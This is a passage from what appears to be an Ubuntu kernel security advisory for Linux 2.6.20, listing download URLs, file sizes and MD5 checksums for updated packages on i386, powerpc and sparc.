http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-glx-legacy_1.0.7184+2.6.20.6-17.31_i386.deb\n      Size/MD5:  3064282 0566dcf2de8751dee79339a5b7d86d90\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-kernel-source_1.0.9631+2.6.20.6-17.31_i386.deb\n      Size/MD5:  1763250 0f0cb7cb6f68759e3052cdad1f1ca473\n    http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.20/nvidia-legacy-kernel-source_1.0.7184+2.6.20.6-17.31_i386.deb\n      Size/MD5:  1376080 39281eee5e0b5d6ea831675349ee365f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/avm-fritz-firmware-2.6.20-17_3.11+2.6.20.6-17.31_i386.deb\n      Size/MD5:  1207908 b07a58f361554e355338ca08d44e8554\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/fglrx-control_8.34.8+2.6.20.6-17.31_i386.deb\n      Size/MD5:    77680 b30bcb45b4d6f7421ef5fb757554d830\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-386_2.6.20.6-17.31_i386.deb\n      Size/MD5: 16340226 0e7dd6aacb36a5601e80ba98555edc11\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-generic_2.6.20.6-17.31_i386.deb\n      Size/MD5: 16096356 77590a41029409066d5093fcdf1127e9\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-386-di_2.6.20.6-17.31_i386.udeb\n      Size/MD5:   966226 3a154fc15eecb9458f89939015ce51de\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-generic-di_2.6.20.6-17.31_i386.udeb\n      Size/MD5:   966294 cb62f0ea1152f4c9c890b80e4427521e\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-386-di_2.6.20.6-17.31_i386.udeb\n      Size/MD5:  2120570 11bc64fd197a751a742a6956ae0fd9a6\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-generic-di_2.6.20.6-17.31_i386.udeb\n      Size/MD5:  2160580 6d566ca1acbd7fc9b5f795daeeaedd88\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-dev_1.0.9631+2.6.20.6-17.31_i386.deb\n      Size/MD5:   156130 bd651a0a3892fdc3d5ff187cc0a45488\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new-dev_1.0.9755+2.6.20.6-17.31_i386.deb\n      Size/MD5:   156600 5a124f9290921dac4d77a349b3ac070e\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx-new_1.0.9755+2.6.20.6-17.31_i386.deb\n      Size/MD5:  4833270 1e6deb4cfbd5cbf29d8f79b0e597c454\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-glx_1.0.9631+2.6.20.6-17.31_i386.deb\n      Size/MD5:  4492558 c56ab1045d05d8560a41a7b87e2a1c39\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nvidia-new-kernel-source_1.0.9755+2.6.20.6-17.31_i386.deb\n      Size/MD5:  2454162 55179cc72ce26c101aedb84841e1eb08\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-player-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb\n      Size/MD5:  1666848 ebb6fbab6e18332d046fa0d79abc9c0f\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-server-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb\n      Size/MD5:  2860690 ae88be47f7596e2c8316f4e3a22377ec\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/vmware-tools-kernel-modules-2.6.20-17_2.6.20.6-17.31_i386.deb\n      Size/MD5:   760492 a392956778451398b8da03b1c79bc051\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx-dev_7.1.0-8.34.8+2.6.20.6-17.31_i386.deb\n      Size/MD5:   130326 755509fec142e17ce0dd45b9e929064c\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/xorg-driver-fglrx_7.1.0-8.34.8+2.6.20.6-17.31_i386.deb\n      Size/MD5:  6143092 6d6f3014f01f78b0dd8783366bc5563f\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb\n      Size/MD5: 23844798 a165f36a05f57654361b4646218e9e9e\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-lowlatency_2.6.20-17.36_i386.deb\n      Size/MD5: 24183826 a75c933ed52aa1c39a22bec126889627\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc-smp_2.6.20-17.12_powerpc.deb\n      Size/MD5:    93372 810566bb7bb90b911ee2dc796e8c6cfd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc64-smp_2.6.20-17.12_powerpc.deb\n      Size/MD5:   118178 08fecf5875b7515466304a5e556d9c82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-powerpc_2.6.20-17.12_powerpc.deb\n      Size/MD5:    92842 4d4192118b9b0f015678bfcd21e6445c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-powerpc-di_2.6.20-17.12_powerpc.udeb\n      Size/MD5:    95164 2c39459a0a423d23a74a52229d48d9cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.12_powerpc.udeb\n      Size/MD5:   130572 82ae1b3368e8e7779670bd70196cde66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   328832 592f394abdc8a41de6f89a16aa8dceed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   325582 d502b2644f843efde702815b028c1618\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    41184 31ce69aa1a6c5a51fb21dd2546ddb7d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    47450 6fbc8b234f4b98e3f66d8ff4f187c74c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   219678 9516e67812981692229cc9aba7e9b155\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   239166 7f7662bb24b02f1a44f738354686ae93\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    43654 b44df31b967a80e31758c41e05ef2c09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    39792 5cfed09a0fa48ce3838b2ba21ba4dad1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   717818 5375198b75e2a9a5d9f410af42d95524\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   776424 83319a673c7c9b10461de0aefd6e988b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   205086 aa0011d2dedf01aa32c1837777c7c2f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   209728 caee4552ea2b0b3d9e43b9610ca91adf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    59226 bd1604cf99df7ca4b0522ba0c1441452\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    66860 a47c0ac4b101a2b40bb2f311424d0515\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    64206 08027501addf0c66a9ea6cfb41227300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    65330 5e617fdfc44c7335fc985e642d6c4130\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   144094 6ee22538b68ddda69ad8469d03cefec6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   162836 4258bd871f4baf4f81a1d5cc940058e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   383348 0d6dd42f3a57d99915c48252c47c7c6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   251812 b7f4e7cd8e7661da5f3c57d67d395420\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  2157764 98a7bbb74cc5e35b7bddc4d8fc12dd35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  3083674 83e44937cfeecffdef687e70f13b1093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5:   864430 7bf3208e87d976b60431d01aa84703d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5:   868770 0212168af66d47b1953bf59beb405822\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb\n      Size/MD5:   862718 0edc424b8e413441e74362954ba58b09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_powerpc.deb\n      Size/MD5:  8151920 cc6e385dce05073af3df268acce45ebd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5: 24517498 cf103d3e1ed625118d0998b12bab86bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5: 26861638 cbde33235ec6a7a6046ee860176b1593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb\n      Size/MD5: 24220490 e556a72ab4e97dfb786e72d740fa2f24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5:  2128680 cfe9700869769c505d5b8d1d1c196e4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc64-smp_2.6.20-17.36_powerpc.deb\n      Size/MD5:  2855084 b3cc89ef46e5e4d06b2653172fe3b283\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-powerpc_2.6.20-17.36_powerpc.deb\n      Size/MD5:  2050182 3bc2e7f25ebe8bea2839aebde16ffcd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-17.36_powerpc.deb\n      Size/MD5:   645210 3c8a7642f76a3bab805c4deb34a7cac0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   253008 447d9c9761dfe18be30d647e1b96ba74\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   295072 a08094ed9b4cdb0b20b4ef07fe6a5496\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   155558 8c9bcba70f826b2c4fb871ebf3a12730\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   168430 19b9a0c1a718af5acaa1a97d28f23450\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   248328 7a33c002d5adebd73837fb91df317c41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   280138 8d505bd1e195b9b165529180732ca1af\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  1110500 8f0022f1c5e95795aaaa1a07e814957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  1110660 881fe6e0eaa3db15879e0e893684509d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  1951192 7e74e7050d2af4763c728f9e6f52b8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  2253422 13f6832a0289630d2e088812dbe1f8d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   233498 0e5efa4dc2c1d60f2d63f736dcd3f720\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   223070 da1c37cf1a9665c274cdedb7d7d13dce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   172914 879737cfde3f122ef489bd0a34e8d1f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   205506 5b476284715dabe07a18acd0365b3f23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   280976 1c05e11f0c7f33fa2ed6ed13650b396e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   316584 b4c7b3b1ec87ba54dddcc5d7ed85f148\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    44652 92750df6fd5855b3b84539e7ee40bad7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    43410 7de7ea097bbd5b0097c8a8dc21c362b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    41212 85c1a08a0dcc9cdc4999243b4607f277\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    53694 3a9e0e870d09ff29d98ea397eb9ca38f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    72814 f069b8db376da6ba6523c1f1a1744a05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    85272 6dc2d289a49942a9beba89f338f11bca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    74542 64495f2bd744e1285c20f04aa7dc3a98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    29722 26ac6df4a55fd8a7168ded5d445aa891\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:     8396 a7dee9e87ee7e13108a2abf55958ee31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:     9878 1c5f8521e8c11ec701f492a2b14d220f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    56170 927213142db35ecd6e22cb7b6c64314e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    67412 3eef4694fda05e830ac9b0d649879387\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    86632 244854a18a5ed03c371bb05b9f2142c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   129200 a76825598a96c16432ed54bbd9288f5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   322566 7f7779fa071fce5f29f59ce076e21853\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   322588 0cafc2b9ef45c349253c52e3de0c5c36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  1415810 bf842d6db566d7be83f36be0e045cdec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:  1345396 0463bf1a542fbf4ecf4ce2e4420a933c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    74242 2b6a9627312c1586aabdcdf4f7c8892b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    83244 6bac15c4400ddefb121c19b440bd30a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    12020 430e6dd156acd4313105e5e8d808c0ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    13940 2080831826d60e6e87672ddf66f0c6c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    78350 0b82c56c00c548e9a96c2ca73cec6f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    85460 4361070d89cfb39069ea8989da654076\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   398184 3a97b6bc7374983dfd5d99ba425886d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   445198 85fe66984eccab5882988b168735b544\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-powerpc-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:    76712 6da01c2a1af08c51050eb89082bc244c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-powerpc64-smp-di_2.6.20-17.36_powerpc.udeb\n      Size/MD5:   100188 ba1822b9e7dacd482afa36a1a853db3e\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc-smp_2.6.20.6-17.31_powerpc.deb\n      Size/MD5:  1295164 bfd9c631a8c1eaf0d77f960052c83dd4\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc64-smp_2.6.20.6-17.31_powerpc.deb\n      Size/MD5:   998682 a82f0cb709d699144fecad690e04f602\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-powerpc_2.6.20.6-17.31_powerpc.deb\n      Size/MD5:  1292544 1bd7e025d89460f69ad71fcbd8731781\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-firmware-2.6.20-17-powerpc-di_2.6.20.6-17.31_powerpc.udeb\n      Size/MD5:   966288 8b862192df81aba11c1f6cfe2bd4eee1\n    http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/nic-restricted-modules-2.6.20-17-powerpc-di_2.6.20.6-17.31_powerpc.udeb\n      Size/MD5:   295204 df056e69d9aa45f76533009d499c6585\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64-smp_2.6.20-17.12_sparc.deb\n      Size/MD5:    95642 6d7c17541cee91e8eb06912a9f20a396\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/linux-backports-modules-2.6.20-17-sparc64_2.6.20-17.12_sparc.deb\n      Size/MD5:    95344 8db377d069385f539a621e562b2df10b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.20/updates-modules-2.6.20-17-sparc64-di_2.6.20-17.12_sparc.udeb\n      Size/MD5:    99130 2f245b90b8b087f61da2caf49f524fbe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    53734 0680b9f0398d7e48c53e7295c77cab8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    42158 3da50612014614dac0ab87c946c65e6f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   211716 77368597943d10a9a5586f8a1ecc06db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   607912 8da7a2b5371fb5f1a302a6e57e4ae95e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   142716 73f99532873b9c75317de0adb7471740\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    51444 f42e7104565f89629799aa413dca2b7b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:    37414 12f0474f7342185f4d1b0b587c55f2f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:   151172 086fc37a2e1e76e3022f2254574affc8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb\n      Size/MD5:  1933034 e1905a3433fad1d9462bea90cdc91535\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb\n      Size/MD5:   780696 0ec6f4b5e642f0193e6c02ea4465008a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb\n      Size/MD5:   776890 0e303a6399f5d569ee7984a2b010c500\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-17_2.6.20-17.36_sparc.deb\n      Size/MD5:  8122866 d8d4552de1aa0078c02c0e428b6dd48a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb\n      Size/MD5: 16953716 0b6bcacad41c64b40fa2d3b97557acf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-17-sparc64_2.6.20-17.36_sparc.deb\n      Size/MD5: 16601038 9033c13349be02c8001f47d79888e214\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-17-sparc64-smp_2.6.20-17.36_sparc.deb\n      Size/MD5:  2264344 ab3e7e36ec1257d862dd600eff70ccaf\n    